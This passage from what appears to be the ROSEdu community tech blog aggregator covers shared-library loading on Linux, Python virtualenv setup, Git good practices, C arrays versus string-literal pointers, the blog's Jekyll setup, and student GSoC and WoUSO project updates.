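    cosine = libm.cos                    # symbol lookup, like dlsym()
    cosine.argtypes = [ctypes.c_double]  # describe the C prototype
    cosine.restype = ctypes.c_double
    return cosine


if __name__ == "__main__":
    print("%f" % load_cosine()(2.0))
```

Nothing about the math library is known when the interpreter itself is built; the library is located, mapped and searched for the symbol only when load_cosine runs.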
Advantages of a certain type of library (static or dynamic) are disadvantages for the other one and vice versa.
Static library-generated executables have increased portability. All code is inserted into the executable so that moving it to a different system doesn’t require the presence of that library there. These executables tend to be faster, as no additional overhead is incurred at load-time or run-time.
Dynamic library-generated executables have two main advantages: they are smaller in size and library files have a smaller memory footprint. The first advantage is due to not copying function code at link time: only references are added to the executable without additional code. The second advantage is stated in the Unix name for dynamic libraries: shared-object libraries. A library may be mapped in memory and all processes that use the library would use the same code. Thus, 50 processes that use the C standard library would require a single instance of the library to be mapped in memory.
Library Management
When discussing library management, we are talking about dynamic libraries. This is due to the fact that, when using the library code (either at load-time or run-time), the loader needs to know where to find the requested libraries.
The Linux loader is called ld-linux.so. As stated in the man page: “The programs ld.so and ld-linux.so find and load the shared libraries needed by a program, prepare the program to run, and then run it.” The loader needs to look up shared libraries in order to run the program and instantiate a process.
Bear in mind that the -L. option passed to GCC when doing linking is only used at link-time. It’s used to locate the library at link-time, not at load-time or run-time.
In order to configure the loader to look up libraries for dynamic linking in a given folder (for example, the current folder – .), there are two main options: using the LD_LIBRARY_PATH environment variable or the ldconfig command.
The LD_LIBRARY_PATH variable is a list of colon delimited folders where libraries are searched. It must be set when the loader is invoked – that is, when running the executable:
export LD_LIBRARY_PATH=.
./myexec
Using the LD_LIBRARY_PATH variable is excellent for testing. It does however pose two disadvantages: it does not allow persistent configuration and it may suffer from security vulnerabilities similar to the PATH environment variable.
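The lookup through a colon-delimited list of folders can be pictured with a few lines of Python. This is a deliberately simplified model of the search (the real loader also consults its cache file and default directories, and the function name is hypothetical); it only shows that the first folder containing the file wins.

```python
import os


def find_in_library_path(name, library_path):
    """Return the first folder/name that exists in a colon-delimited folder list."""
    for folder in library_path.split(":"):
        if not folder:
            continue                     # empty entries are skipped in this sketch
        candidate = os.path.join(folder, name)
        if os.path.isfile(candidate):
            return candidate
    return None                          # not found in any listed folder


if __name__ == "__main__":
    search_path = os.environ.get("LD_LIBRARY_PATH", "")
    print(find_in_library_path("libtest.so", search_path))
```

Because the list is walked in order, putting a folder at the front of LD_LIBRARY_PATH is enough to make a different copy of a library win, which is exactly the security concern mentioned above.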
The other approach is the use of the ldconfig command. ldconfig is used to populate the library list cache file /etc/ld.so.cache. The cache file is read by the loader to search for libraries. On Debian-based systems, every time you install a library, ldconfig is run to populate the cache file.
In order to incorporate a new folder in the library search path, one may resort to a persistent configuration or a temporary one. For a temporary run, simply pass the new folder to ldconfig:
razvan@einherjar:~/code$ /sbin/ldconfig -p | grep libtest
razvan@einherjar:~/code$ sudo /sbin/ldconfig /home/razvan/code/
razvan@einherjar:~/code$ /sbin/ldconfig -p | grep libtest
libtest.so (libc6,x86-64) => /home/razvan/code/libtest.so
For a persistent configuration, one would need to edit the configuration file and/or folder for ldconfig, namely /etc/ld.so.conf and /etc/ld.so.conf.d/. Simply add a new folder in the configuration file and run ldconfig.
When using dlopen & friends, the same kind of configurations may be used: LD_LIBRARY_PATH, temporary use of ldconfig and persistent use of /etc/ld.so.conf.
Conclusion and Further Info
Extensive information about the actions taken by the loader to use dynamic libraries is found in the man pages: ld-linux.so, ldconfig and dlopen & friends.
John R. Levine’s “Linkers & Loaders” is an extensive depiction of linkers, loaders, libraries and the load process.
Proper knowledge of library management on a Linux based system relies on good understanding of the linking and loading processes and library types. Make sure you understand the advantages and disadvantages of each approach and choose the one most suitable to your specific needs.
02 October 2011 09:00 PM
24 September 2011
This article is a quick guide to setting up a Python work environment. It walks you through installing Python with some basic package management tools (distribute, pip, virtualenv), setting up projects, and installing packages.
Bootstrapping
First of all we need to have a working Python interpreter. You want to install the latest release of 2.7 for now (September 2011). Python 3 is gathering momentum but many libraries don’t support it yet.
- In most Linux distributions, and in Mac OS, some Python is already installed. You may, of course, install a different one from scratch. For Mac OS, the homebrew version is highly recommended.
- On Windows you install a pre-compiled release from http://python.org/download/.
- To install from source, you need a C compiler, and a tarball from http://python.org/download/. The usual ./configure; make; make install should work just fine. Consider installing into a separate folder, e.g. ./configure --prefix=/usr/local/Python-2.7, so you can easily remove it at some point in the future.
Now, the typical mistake is to declare victory, and use this Python installation for everything. In time, you want to use various libraries, so you install them on top of Python. Eventually you get a version conflict (some project requires a library which is too new for another project). Fortunately there is a better way: virtualenv.
The command-line examples use $MYPYTHON as placeholder for the Python installation path. This can be /usr for a Linux distribution install, /usr/local for default manual installation, /usr/local/Cellar/python/2.7.2 for mac Homebrew, or even C:\Python27 on Windows.
If you’re on Linux, and use a Python package from the distribution, it’s a good bet they have virtualenv too. For Debian, Ubuntu and Fedora, the name is python-virtualenv. This may be outdated, so if you experience problems, check the version and consider installing the latest one (see below).
In a fresh Python installation, to get virtualenv, we need to install distribute and pip first. distribute is an older package manager, and pip is newer and more powerful, but it depends on the older one to do heavy lifting. So, download distribute_setup.py, and, assuming you installed Python in a folder called $MYPYTHON, do the following:
> $MYPYTHON/bin/python distribute_setup.py
> $MYPYTHON/bin/easy_install pip
> $MYPYTHON/bin/pip install virtualenv
If everything worked out fine, you should have a script called virtualenv in $MYPYTHON/bin, and you can safely remove distribute_setup.py and distribute-x.y.z.tar.gz.
That’s all you normally install in the global Python folder. Maybe throw in some commonly-used, slow-to-change, takes-a-while-to-compile package like PIL or SciPy, or the odd manually-installed kits on Windows, but everything else goes into a virtualenv.
Virtual insanity
Say you want to work on WoUSO, and the documentation tells you that you need to install Django. The very first thing you do is create a virtualenv. We’ll use $MYENV as placeholder for the path to a new folder where you want to work:
> $MYPYTHON/bin/virtualenv $MYENV
virtualenv will create the folder, write some files, then run off and get distribute and pip. It should all take a few seconds. When it’s done, you have $MYENV/bin/python, which is a fully functional Python interpreter. Next to it, there is $MYENV/bin/pip, which you can now use to install things:
> $MYENV/bin/pip install Django
This will go to PyPI, look for a package named Django, and install the latest version. The installation happens inside $MYENV, in the lib/python2.7/site-packages subfolder. This Django doesn’t affect the original Python installation or any other virtualenvs you create. Of course, multiple virtualenvs can have different versions of Django.
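To check which installation a given interpreter belongs to, a small script along these lines can help. It is only a sketch: the function name in_virtualenv is made up for illustration, and it relies on virtualenv setting sys.real_prefix in older releases and sys.base_prefix in newer ones (the latter is also what the Python 3 venv module does).

```python
import sys


def in_virtualenv():
    """Return True when the running interpreter lives inside a virtualenv."""
    # Older virtualenv releases set sys.real_prefix; newer releases and the
    # Python 3 venv module make sys.base_prefix differ from sys.prefix.
    real_prefix = getattr(sys, "real_prefix", None)
    base_prefix = getattr(sys, "base_prefix", sys.prefix)
    return real_prefix is not None or base_prefix != sys.prefix


print("prefix:", sys.prefix)
print("inside a virtualenv:", in_virtualenv())
```

Running it once with $MYPYTHON/bin/python and once with $MYENV/bin/python should show two different prefixes.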
Bits and pieces
Now, if you start happily creating many virtualenvs, installing a lot of packages, you’ll be downloading the same files over and over again. Fortunately, pip can be configured to cache the downloads:
> cat ~/.pip/pip.conf
[global]
download_cache = ~/.pip/cache
Depending on the setup, sometimes you have to deal with globally-installed packages, for example if you’re using the Python from a Linux distribution. It’s still possible to create a virtualenv that ignores those packages by passing the --no-site-packages option to virtualenv. This simply leaves out the global site-packages folder from Python’s import path.
Some projects include a requirements.txt file in their source tree, which lists dependencies. You install these with pip install -r requirements.txt. Writing your own requirements.txt is easy: each line is a set of arguments for one invocation of pip. Or simply run pip freeze, which generates a list of all the installed packages and their versions.
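The output of pip freeze is a plain list of name==version lines, so it is easy to process with a few lines of code. The sketch below assumes that simple form only; the helper name parse_freeze and the package versions in the sample are hypothetical, and real requirements files may contain other kinds of lines (options, URLs, version ranges) that this ignores.

```python
def parse_freeze(text):
    """Map package name -> pinned version for lines of the form name==version."""
    pins = {}
    for line in text.splitlines():
        line = line.strip()
        # Skip blank lines and comments.
        if not line or line.startswith("#"):
            continue
        name, separator, version = line.partition("==")
        if separator:
            pins[name] = version
    return pins


# Hypothetical sample, not the output of a real environment.
sample = """
# requirements for a small web project
Django==1.3.1
South==0.7.3
"""

print(parse_freeze(sample))
```

Comparing the dictionaries produced for two virtualenvs is a quick way to spot the version conflicts mentioned earlier.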
When you get tired of typing $MYENV/bin/something all the time, you may want to activate the virtualenv. This is a fancy name which simply means that $MYENV/bin is prepended to your current $PATH (and your $PS1 is enhanced):
> . $MYENV/bin/activate
(myenv)> # "python" invokes "$MYENV/bin/python"
(myenv)> deactivate
> # back to the original shell environment
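The effect of activation on $PATH can be sketched in a few lines. This is a simplified model, not the real activate script (which also sets other variables and defines deactivate); the function name activated_path and the example paths are assumptions made for illustration.

```python
import os


def activated_path(env_dir, current_path):
    """Return the PATH value as it would look after activating env_dir."""
    bin_dir = os.path.join(env_dir, "bin")
    if not current_path:
        return bin_dir
    # The virtualenv's bin folder goes first, so its "python" and "pip" win.
    return os.pathsep.join([bin_dir, current_path])


print(activated_path("/home/me/myenv", os.pathsep.join(["/usr/local/bin", "/usr/bin"])))
```

Because the shell searches $PATH from left to right, typing python after activation finds $MYENV/bin/python before any global installation.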
If you find yourself working on a package, the kind that has setup.py and installs with pip, you want to install the package in “edit” mode. Check out the source tree, then (assuming you’re in the same folder as setup.py) run pip install -e . (the trailing dot is part of the command and means the current folder). This will install the package in-place. Technically, a link is made in site-packages that extends Python’s import path to find your package, any dependencies in setup.py are installed, and scripts are installed in $MYENV/bin, if the package has any.
Further reading
These wonderful tools are available on PyPI, the Python Package Index. Most of them have good documentation that explains more features that did not fit in this article. Also, remember docs.python.org (behold the table of contents), where you can find documentation on the language, a nice tutorial, and excellent documentation for the standard library.
24 September 2011 09:00 PM
11 September 2011
Git is an excellent SCM (source code management system). I use it for a plethora of tasks such as managing code, scripts, LaTeX files, config files, Org-Mode files. I try to base all my work on text files so that it can be managed through Git.
In this post I wish to share some of the knowledge and skills I’ve gathered while using Git. I am a novice myself in many aspects of using Git, but I feel confident about my basic usage skills and good practices.
My aim is to present tips and good practices that allow using Git to its full potential while conforming to recommendations. This is not a tutorial or a comprehensive view of Git. In case you are looking for that, I recommend the excellent Git Immersion tutorial and the Pro Git Book.
An important aspect to have in mind is the data model that Git uses. While most SCMs use changesets to manage commits, Git uses snapshots. Each commit is a snapshot of the entire project; it is not a set of file patches. Bear this in mind when using Git commands and playing around with commits. You may also check this tutorial for a more thorough presentation.
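The snapshot idea can be illustrated with a toy model. The sketch below is not Git's actual object format; the functions snapshot and changed_paths are invented for this example. Each "commit" records a hash for every file in the project, and a patch-like view is derived afterwards by comparing two snapshots.

```python
import hashlib


def snapshot(files):
    """Toy commit: map every path in the project to a hash of its full content."""
    return {path: hashlib.sha1(data.encode()).hexdigest() for path, data in files.items()}


def changed_paths(old, new):
    """Derive the list of changed paths by comparing two snapshots."""
    return sorted(path for path in set(old) | set(new) if old.get(path) != new.get(path))


first = snapshot({"README": "hello\n", "main.c": "int main(void) { return 0; }\n"})
second = snapshot({
    "README": "hello\n",
    "main.c": "int main(void) { return 1; }\n",
    "Makefile": "all:\n",
})

print(changed_paths(first, second))
```

The unchanged README has the same hash in both snapshots, so a snapshot-based store can keep a single copy of its content.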
Configuring Git
The first step of using Git is configuring your identity and preferences, as highlighted by most tutorials. The recommended practice is to configure Git at user level (using the --global option, which stores the settings in your account’s ~/.gitconfig file):
git config --global user.name "Razvan Deaconescu"
git config --global user.email "razvan.deaconescu@cs.pub.ro"
git config --global color.ui auto
I recommend issuing the above commands once on each account from which you will use Git.
In case you want a different configuration (another email address, for example) for a given repository, just issue the above commands (sans the --global option) while in that repository.
A situation may arise when you want to create a commit (or a series of commits) that uses different user information. This may happen when you and a friend have access to a common account, and you want to separate your commits from hers/his (although run from the same account). There are two situations and approaches to this:
- Situation: You want to use a different identity for all (or most) commits in a shell session (such as an SSH login session). Solution: Define the GIT_AUTHOR_NAME and GIT_AUTHOR_EMAIL environment variables:
export GIT_AUTHOR_NAME="Mighty McWolf"
export GIT_AUTHOR_EMAIL="mighty@mcwolf.org"
- Situation: You want to use a different identity for a single commit. Solution: Use the --author option when committing:
git commit --author "Mighty McWolf <mighty@mcwolf.org>"
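The way these settings override one another can be summarized in a short model. This is only a sketch of the order discussed here (the --author option first, then the environment variables, then the repository configuration, then the --global configuration); the function resolve_author is hypothetical, the repository email is a made-up example, and Git itself consults a few more sources than shown.

```python
def resolve_author(global_cfg, repo_cfg, env, author_option=None):
    """Pick the author identity from the most specific source that provides one."""
    if author_option:
        return author_option
    name = env.get("GIT_AUTHOR_NAME") or repo_cfg.get("user.name") or global_cfg.get("user.name")
    email = env.get("GIT_AUTHOR_EMAIL") or repo_cfg.get("user.email") or global_cfg.get("user.email")
    return "%s <%s>" % (name, email)


global_cfg = {"user.name": "Razvan Deaconescu", "user.email": "razvan.deaconescu@cs.pub.ro"}
repo_cfg = {"user.email": "razvan@example.org"}  # hypothetical per-repository override
session_env = {"GIT_AUTHOR_NAME": "Mighty McWolf", "GIT_AUTHOR_EMAIL": "mighty@mcwolf.org"}

print(resolve_author(global_cfg, repo_cfg, {}))
print(resolve_author(global_cfg, repo_cfg, session_env))
```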
Commits
Everything in Git revolves around commits. A commit is a basic unit of information that you submit to Git for handling. Git stores each commit and links it to other commits such that you see a commit history, get back to a previous state, create a branch, watch the commit tree, update certain commits, create tags and many others. As mentioned above, a commit represents a snapshot of the entire project.
A basic rule, which applies to all other SCMs as well, is that each commit must keep the repository in a compilable state. That is, if someone checked out a random point in the commit history, they would still be able to compile the source code. Make sure the project is in a compilable state when issuing your commit.
While the repository needs to be in a compilable state, it need not run perfectly. In fact it may end up in “Segmentation fault” or other critical errors. That’s no problem; it’s not achievable (not possible actually) to have a clean repository where each commit would break nothing. Do not be afraid to break the application when issuing a commit as long as it’s in a compilable state. If the application breaks, another commit will fix it; an impatient contributor could very well revert to a previous commit and create a branch from there. Moreover, trying to keep the application running may force you to disobey the next recommendation.
Another important recommendation, heavily stressed in Git but probably insisted on in other SCMs, is creating small, atomic commits. Each commit should do one thing and do it well. A commit should not use a message such as “Update everything.” or “Fix plenty of errors.” Rather, each fix should go into a separate commit. This would make it very easy for a reviewer to analyze and diff your commit and, possibly, isolate a bug that you may have introduced. If your commit spans a whole bunch of features that introduce multiple bugs, isolating those bugs and fixing them is a pain.
So, remember: Create small atomic commits that keep the repository in a compilable state.
Commit Messages
When your commit is ready, you’ll issue the git commit command and either use the configured editor or the -m option to write the commit message. Either way there’s a basic set of recommendations you should follow when writing a commit message.
- Keep it short. Ideally, the first line of your commit message should consist of at most 50 characters. In case your message is longer, break it into sentences, and leave a blank line between the 50-character summary and the rest. The rationale, as mentioned in the git commit manpage, is that the first line is used as an email subject line by various tools.
- Use present tense when issuing a commit. This ensures “compatibility” with messages used by tools such as git merge.
- Write sentences, not descriptions, similar to good code comments. Start with a capital letter, use verbs and end with a dot.
Tim Pope writes about what makes a model Git commit message.
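The mechanical parts of these recommendations can be checked automatically. The sketch below is one possible checker, with a made-up function name (check_commit_message); it covers the length, capitalization, final dot and blank line rules, while the tense of the message still has to be judged by a human.

```python
def check_commit_message(message):
    """Return a list of problems found in a commit message."""
    problems = []
    lines = message.splitlines()
    subject = lines[0] if lines else ""
    if not subject:
        return ["empty subject line"]
    if len(subject) > 50:
        problems.append("subject longer than 50 characters")
    if not subject[0].isupper():
        problems.append("subject does not start with a capital letter")
    if not subject.endswith("."):
        problems.append("subject does not end with a dot")
    # A body, if present, must be separated from the subject by a blank line.
    if len(lines) > 1 and lines[1].strip():
        problems.append("no blank line between subject and body")
    return problems


print(check_commit_message("Fix off-by-one error in list parser."))
print(check_commit_message("fixed stuff\nmore details"))
```

A function like this could be called from a commit-msg hook, although wiring it into a hook is left out here.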
Creating and Updating Commits
Remember that your commits should be small: do one thing, do one thing well.
What happens when you’ve made a lot of changes and you want to create a commit? You need to “split” your changes into multiple commits. For that you use git add -i (-i for interactive). When using -i, Git prompts you about what to stage for the commit. Most likely you would:
- choose the patch option (press p or 5)
- choose the file you want to “split”
- press Enter
- answer y or n to include/exclude certain chunks
- press q to quit
At this point, the modified file would be found both in the staging area and in the “changes” area. The staging area would solely consist of the chunks you selected previously.
What if you’ve just created a commit and realized that the commit message may be wrong or that there should have been another hunk or file committed? In this case you would use git commit --amend. As the option name says, this lets you amend the commit, be it to update the commit message or to add certain files: just issue git add (or git add -i) and then invoke git commit --amend. Combined with --author, the --amend option even allows you to update the author identity.
What if you want to update a commit that is not the latest? If the commit has been pushed to the remote repository, then it’s quite complicated and not recommended. However, if the commit is local and hasn’t been pushed, you may use git rebase -i. You have to specify the commit ID from which rebasing will start. Afterwards you will be presented with an editor screen listing the commits created since then, where you can select which ones to change. Usually you would replace the pick string with edit on those commits, and Git will stop at each of them in turn.
For each commit you will most likely issue some git add commands, then git commit --amend and, finally, git rebase --continue.
As long as the commits are local (not pushed to the remote repository), all is fine.
Stashing
On certain occasions, you may need to run some commit update commands (such as git rebase, git pull) but retain some “dirty data” in the repository. As Git disallows the existence of non-committed data in such occasions, the solution is stashing.
Stashing means you temporarily store your data in a specialized zone such that it would not get in the way of the above commands. In order to stash local changes, you would simply issue the git stash command. After updates have occurred, use git stash pop to bring back changes and revert to the original “dirty state”.
Ignoring Data
Some files or data have to be kept from being committed, while others need to be ignored because of process specifics or user preference.
As a rule of thumb, a repository should only manage text files; no binary files such as image files, compressed files, object files, executable files. If you are a web developer or someone who has to work extensively with image files, the above rule wouldn’t apply 100%. You should, however, only commit source code files and files that cannot be compiled or linked from other files.
Consequently, a good practice is to create a top-level .gitignore file in your repository and define the files to be ignored. A basic .gitignore file is shown below:
sample .gitignore
*~
*.swp
*.swo
*.o
*.obj
*.a
*.so
*.dll
*.lib
*.gz
*.bz2
*.zip
Optional .gitignore files may be created in subfolders of the repository according to need.
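To get a feeling for what such patterns match, the sketch below tests a few file names against some of the patterns above using Python's fnmatch module. This is an approximation: it is adequate for simple wildcard patterns like these, but .gitignore has additional rules (slashes, negation with !, directory-only patterns) that fnmatch does not model. The helper name is_ignored and the file names are assumptions for illustration.

```python
from fnmatch import fnmatch

# A subset of the sample .gitignore patterns.
PATTERNS = ["*~", "*.swp", "*.o", "*.so", "*.gz"]


def is_ignored(filename, patterns=PATTERNS):
    """Return True if the file name matches any of the wildcard patterns."""
    return any(fnmatch(filename, pattern) for pattern in patterns)


for name in ["main.c", "main.o", "notes.txt~", "archive.tar.gz"]:
    print(name, is_ignored(name))
```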
.gitignore files are committed in the repository and their exclusion rules are applied to all contributors. A situation may arise when you create a folder that you want to reside in your repository clone but never get committed. For example a lib folder consisting of libraries you are linking against for testing purposes. As it is binary data it shouldn’t be committed, and, as you are the only one using it, it should be ignored. You could add it to the .gitignore file but that would complicate it. The best solution is to edit the .git/info/exclude file. It follows the same syntax as .gitignore files but is local to your clone.
The above solutions are not useful in a specific situation: you want to ignore changes you make to a file that is being tracked. .gitignore and .git/info/exclude only ignore non-tracked files; they can’t be used on files that are being tracked. Your solution lies in running the command git update-index --assume-unchanged abc.txt. Issuing this command ensures that any local updates to the abc.txt file are not going to be taken into account when creating subsequent commits.
A large part of your interaction with Git is analyzing commits, diffing, checking commit history etc. Visual tools are very important and provide you an intuitive view of the repository commits. Such tools are Git GUI, gitk and giggle. A nice tool, running on an ncurses-based interface is tig.
Apart from that, several commands are heavily used throughout your work in Git, from a “view point of view” so to say:
- git status provides you with information regarding the current branch, information in staging area, “dirty” information etc.;
- git log provides you with a CLI view of the commit history; a useful option is --oneline, which shows one commit per line;
- git diff presents a diff between various states of the repository:
  - without any argument, git diff shows changes in the working directory that have not been staged yet (working directory versus staging area);
  - a single argument to git diff is a commit ID or tag that is diffed against the working directory;
  - two arguments to git diff are two commit IDs or tags to be diffed against each other.
A useful option to git diff is --cached. This option presents a diff between HEAD and data in staging area. It’s useful to check everything is in order before creating a commit.
Cleaning Up
An important activity is cleaning up files in different states (staging, modified, non-tracked).
The list below highlights various user requirements and solutions to those predicaments:
- You want to clear any updates you’ve done to a file that’s being tracked:
git checkout file.name
- You want to remove a file from the staging area and place it in the modified state; you want to build your commit in a different manner:
git reset HEAD file.name
- You want to clear a non-tracked file from the working clone (by default git clean refuses to delete anything without the -f option):
git clean -f file.name
- You want to clear all non-tracked files from the working clone:
git clean -f
- You want to clear all changes and revert to the initial state of HEAD (by changes I’m referring to tracked files changes; this doesn’t affect non-tracked files):
git reset --hard
Other Resources
The Internet is filled with tutorials and tips regarding the use of Git. Google is one of your best friends to provide you a rapid solution to a problem. Through Google, I’ve found a lot of answers on Stack Overflow.
As mentioned above, I find the Git Immersion tutorial to be very well presented and easy to follow and the Pro Git Book to be a good technical presentation of Git and its features. An excellent site, consisting of a plethora of very nicely presented tips, is git ready (“learn git one commit at a time”).
As a funny link, I recommend you access Commit Message Generator.
11 September 2011 09:00 PM
03 September 2011
This post will shed some light on the differences between arrays and pointers, specifically when it comes to referencing string literals. We will base our discussion on the following two programs:
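array.c
#include <stdio.h>

/* An array initialized from a string literal: a writable copy of the characters. */
char a[] = "ROSEdu";

int main(void)
{
    a[0] = 'r';
    printf("%s\n", a);
    return 0;
}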
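pointer.c
#include <stdio.h>

/* A pointer holding the address of the string literal itself. */
char *p = "ROSEdu";

int main(void)
{
    *p = 'r';    /* attempts to modify the string literal */
    printf("%s\n", p);
    return 0;
}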
Program array.c defines an array of char whose elements are initialized with the characters of a string literal, while pointer.c defines a pointer to char and initializes it with the address of a memory area holding a string literal. Notice array a and pointer p allocations in the image above. Can you guess the size of a and the size of p? Next, both programs modify the first character of the string ROSEdu. Are these two programs equivalent? At first glance the answer seems to be positive, but let’s take a minute and actually run the code.
$ ./array
rOSEdu
$ ./pointer
Segmentation fault
While we could modify array a, our program was killed when attempting to modify the string literal pointed to by p. We will now have a look at the generated assembly code and notice the section where the string literal ROSEdu is stored.

$ gcc -S array.c -o array.s
$ cat array.s
.globl a
.data
.type a, @object
.size a, 7
a:
.string "ROSEdu"
$ gcc -S pointer.c -o pointer.s
$ cat pointer.s
.globl p
.section .rodata
.LC0:
.string "ROSEdu"
.data
.type p, @object
.size p, 4
p:
.long .LC0
.text
We can see that array a is stored in the data section, which is writable, so there is no problem when it is modified. On the other hand, we can notice that p is a pointer stored in the data section but it points to a read-only memory location (.rodata), thus writing through it results in ‘Segmentation fault’.
The C99 standard (Section 6.7.8) states that:
- contents of the array a is modifiable.
- if an attempt is made to use pointer p to modify the contents of the array, the behaviour is undefined.
So now we see why the pointer.c program crashed. gcc decided to store the string literal pointed to by p in the read-only data section. One must remark that this is not mandatory; it is implementation-dependent.
We invite you to answer the following questions:
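The same distinction between a writable copy and a reference to immutable data can be observed from Python through the ctypes module. The sketch below is only an analogy, not a reproduction of the C programs: create_string_buffer builds a writable char array initialized from the given bytes, much like array a, while a bytes literal plays the role of the string literal that must not be modified. Unlike C, where the behaviour is undefined, Python reports the attempt with an exception.

```python
import ctypes

# Similar to "char a[] = ...": a private, writable copy of the characters.
a = ctypes.create_string_buffer(b"ROSEdu")
a[0] = b"r"
print(a.value)

# Similar to "char *p = ...": p only refers to the literal,
# and Python keeps bytes literals immutable.
p = b"ROSEdu"
try:
    p[0] = ord("r")
except TypeError as error:
    print("cannot modify the literal:", error)
```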
- What is the sizeof(p) and sizeof(a) in our previous examples?
- What happens if variables a and p are declared on the stack?
- Is it possible for the following expression to yield true: (const char []){"ROSEdu"} == "ROSEdu"?
03 September 2011 09:00 PM
07 June 2011
This blog started as an idea of Răzvan Deaconescu based on the fact that several members of ROSEdu already had technical blogs (linked here on the right) but they were not updated on a regular basis. Having a community blog solves this problem and allows for a greater diversity among the topics presented. Without further ado, this is it.
Excluding this article, the blog will contain technical articles, tips and tricks, quick hacks to solve some problems and some articles explaining different things related to IT. Here we will present the infrastructure of the site.
It is created using the Jekyll static site generator. When this was started there was a little discussion about the back-end and why we should choose a static site generator instead of using Wordpress or Blogspot or similar frameworks. The problem with the “classic” CMSs was that they have a (relatively) high demand of resources and that you’ll always have to use the latest version of the software to prevent attacks.
With a static site there is no database layer and no server-side code that may contain exploitable bugs, so the attack surface is much smaller. Also, since only basic HTML pages need to be served, there’s little memory and CPU usage when serving the website.
Since we will be posting code to this blog, we wanted a framework that displays it nicely. Wordpress has several plugins for this, but it isn’t always fun working with them.
But the really important aspect, the one which ended the debate, was the fact that we are able to separate the content from the actual site, so we can keep a back-up copy of the content. Moreover, we can use a Git repository to hold the configuration and the content. We use a gitolite repository for the actual content with two branches:
- one for the actual content
- one for contributors where the actual content gets posted for review
After the review is done, the actual publishing is done by cherry-picking the good commits to the first branch. A git hook is responsible for doing the actual posting.
The content is written in a simple text file either using the Markdown format or the Textile format. Jekyll is responsible for translating it into the actual HTML page and some server configuration takes care of actual publishing of the pages.
There’s one downside to this, though. Comments and other things that need dynamic code are hard to set up. Yet, there are solutions there too. For example, we use the Intense Debate platform for comments. The alternative, Disqus, could also be used, but we settled on the former.
The actual design of the site was done by learning and experimenting with CSS until we were satisfied with the looks. Having a static generator means that we had to do the entire design by hand but this can be a good thing since we no longer depend on the themes that come with a classic CMS.
Thanks go to: Alex Juncu (setting up the Apache stuff), Răzvan Deaconescu (coming up with this idea and setting up the initial repository), Mihai Maruseac (configuration, layout and workflow)
If you wish to contribute, contact us at techblog@rosedu.org.
07 June 2011 09:00 PM
04 June 2011
This week was a good week for coding, and the best part about it: most of my changes are now in s-c’s upstream trunk.
I started out trying to populate the s-c database with only a few applications; this meant updating the update-software-center tool, and also changing some bits in the database update module. I was glad to discover that some functionality I had planned to develop in week 6 (parsing AppStream app-data xmls) was already there, thus making my job easier.
After that, work continued by abstracting backend parts, such as InstallBackend and TransactionsWatcher, and also isolating as much as possible the apt and apt_pkg usage. I have then expanded the PackageInfo abstraction to implement a dictionary-like interface, containing _Package objects (before that, apt.Package objects were returned). It took some small steps, and sometimes mistakes from my side, but in the end, I guess I have got it done right. Work still needs to be done regarding usage of the candidate and installed properties (which currently are apt.Version objects), and also on the AptCache try_install_and_*depends methods (these should be either abstracted or made apt-backend specific).
At the end of the week, preparing the next point of focus, I have managed to get a development environment with PackageKit and Python gobject introspection data. Here comes the bad news: the py GI for packagekit is not ready for prime time. Reasons for that: GI is relatively new, and there are no other users of PK from Python (only C and Vala). With help from ximion, hughsie, dantti and tomeu (and many other kind souls on #PackageKit, #introspection or #python), we isolated the problem inside pygobject, apparently an incomplete implementation of GPtrArray. I hope to get it fixed next week, so that I can continue work with PK.
Although I am a bit worried seeing segfaults in Python, it’s a sunny day out here (so I can finish my report on a non-technical note) so I’m sure that with help from these awesome people on IRC, problem will be solved, and my project will continue according to the plan.
Next week: gi ninja and more PK!
by Alex Eftimie on 04 June 2011 06:02 AM
27 May 2011
Not much to say about this first week of gsoc (Exams period hasn’t finished yet), so here it comes:
- had an IRC meeting with mentor vuntz of openSUSE and mvo of Ubuntu (the initial software-center author), got some things cleared up and planned the development
- according to my timeline, I now have the trunk version of software-center running in Debian wheezy; there is still work to do, but it is an encouraging start;
next:
- work on a dummy install backend and a dummy package info provider; probably create an elegant way of switching backends;
other stuff:
- got interviewed for the openSUSE news
This is it. See you next week.
by Alex Eftimie on 27 May 2011 04:16 PM
05 May 2011
Hi everyone,
Just a quick announcement that I will be working this summer as a GSoC student, for the openSUSE Project. My mentor will be Vincent Untz, the so-called “father of GNOME 3”.
What I’m aiming to do is modify Ubuntu Software Center to use PackageKit (a universal package management toolkit) as an installation backend, and also integrate it with the AppStream initiative (a cross-distro project for making software installation easier).
My full proposal can be read here (fixed). Feedback and suggestions are, as always, appreciated.
I would like to thank ROSEdu (which I am a member of) for the support.
by Alex Eftimie on 05 May 2011 06:51 AM
12 February 2010
Now that the second-to-last exam session of my final year of university is over, here are the two projects I have been working on in my spare time; there was not much of that time, but it did exist (C3 is not as deadly as I expected, myth busted).
The first is a personal one and is also related to my bachelor’s thesis. I am not publishing code for now; I will only say that it is going to be a fairly large Python application built on top of an SQLite database, using sqlobject, GTK+, goocanvas, reportlab and many other bells and whistles. I ended up writing, among other things, widgets (my friends know why I say this), and I hope to become familiar with these technologies as I develop it. Building and developing it is both a challenge and fun.
The second project, to which I have devoted more time lately, is porting World of USO from PHP to Python and Django. Together with Vlad and Sergiu, I made this decision because we were not happy with the state of the current WoUSO code (too many contributions from different people, with different styles and approaches); in short, it was hard to carry forward and improve. Why Django? Because Django is fun, and too many people have spoken well of it for us not to try it. We tried it and it paid off: in two weeks I managed to implement a basic version that covers almost three quarters of the game’s functionality. I have just received an email from Vlad(um); he is willing to set aside time, so I think we will keep doing good work.
WoUSO is one of the projects proposed to the teams at Cursul de Dezvoltare Liberă (the Free Development Course). More details will be published on the course site. For now I can only start a rumor that we might work on a WoUSO module for that site whose name starts with “face” and ends with “book”.
If you are reading this and you are interested in any of django, python or wouso, don’t be shy, send an email. We would love to have you join the team.
That’s about it. Programming must be fun. There are languages, such as Python, that make programming beautiful, in my opinion.
Links:
http://dev.rosedu.org/wouso/wiki/DjangoPort
http://wouso-django.rosedu.org/ (account alex:alex)
by Alex Eftimie on 12 February 2010 07:56 PM
11 November 2007
I got rejected for Google Summer of Code, but that was to be expected. As easy as Plan 9 is and as much as I loved working with it at the beginning, such matters are too serious to be covered within a week. Perhaps next year I will be better prepared in a field; I would of course like to try my hand at it again.
But Razvan (my Operating System Usage teacher in the first semester) came up with a proposal to write a system that generates spreadsheets for hourly paid course assistants in our faculty. I naturally agreed and a team was quickly formed. We met today for the first time. While the project itself doesn’t sound like much, we decided to do it properly. We are using Razvan’s server for the entire development process (I got a new IMAP email address courtesy of him), including mailing lists, RCS (to be decided), web page, wiki and testing.
